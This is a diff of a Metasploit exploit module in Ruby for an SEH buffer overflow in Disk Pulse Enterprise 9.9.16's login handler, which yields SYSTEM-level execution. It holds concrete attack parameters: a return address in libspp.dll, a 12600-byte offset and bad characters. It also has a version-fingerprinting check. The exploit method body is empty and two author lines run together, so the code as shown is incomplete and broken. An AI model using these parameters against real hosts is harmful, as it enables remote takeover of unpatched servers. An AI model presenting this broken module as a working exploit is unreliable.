1+ ##
2+ # This module requires Metasploit: http://metasploit.com/download
3+ # Current source: https://github.com/rapid7/metasploit-framework
4+ ##
5+
6+ require 'msf/core'
7+
8+ class MetasploitModule < Msf ::Exploit ::Remote
9+ Rank = ExcellentRanking
10+
11+ include Msf ::Exploit ::Remote ::HttpClient
12+ include Msf ::Exploit ::Remote ::Egghunter
13+ include Msf ::Exploit ::Remote ::Seh
14+
15+ def initialize ( info = { } )
16+ super ( update_info ( info ,
17+ 'Name' => 'Disk Pulse Enterprise Login Buffer Overflow' ,
18+ 'Description' => %q{
19+ This module exploits an SEH buffer overflow in Disk Pulse Enterprise
20+ 9.9.16. If a malicious user sends a malicious HTTP GET request,
21+ it is possible to execute a payload that would run under the Windows
22+ NT AUTHORITY\SYSTEM account.
23+ } ,
24+ 'License' => MSF_LICENSE ,
25+ 'Author' =>
26+ [
27+ 'Chance Johnson' , # module - hackback.sh - [email protected] 28+ 'Nipun Jaswal & Anurag Srivastava' # Original discovery -- www.pyramidcyber.com
29+ ] ,
30+ 'References' =>
31+ [
32+ [ 'EDB' , '42560' ]
33+ ] ,
34+ 'DefaultOptions' =>
35+ {
36+ 'EXITFUNC' => 'none'
37+ } ,
38+ 'Platform' => 'win' ,
39+ 'Payload' =>
40+ {
41+ 'BadChars' => "\x00 \x0a \x0d \x26 "
42+ } ,
43+ 'Targets' =>
44+ [
45+ [ 'Disk Pulse Enterprise 9.9.16' ,
46+ {
47+ 'Ret' => 0x10013AAA , # pop ebp # pop ebx # ret 0x04 - libspp.dll
48+ 'Offset' => 12600
49+ }
50+ ] ,
51+ ] ,
52+ 'Privileged' => true ,
53+ 'DisclosureDate' => 'Oct 03 2016' ,
54+ 'DefaultTarget' => 0 ) )
55+
56+ register_options ( [ Opt ::RPORT ( 80 ) ] , self . class )
57+
58+ end
59+
60+ def check
61+ res = send_request_cgi ( {
62+ 'uri' => '/' ,
63+ 'method' => 'GET'
64+ } )
65+
66+ if res and res . code == 200 and res . body =~ /Disk Pulse Enterprise v9\. 9\. 16/
67+ return Exploit ::CheckCode ::Appears
68+ end
69+
70+ return Exploit ::CheckCode ::Safe
71+ end
72+
73+ def exploit
74+
75+
76+ end
77+ end
0 commit comments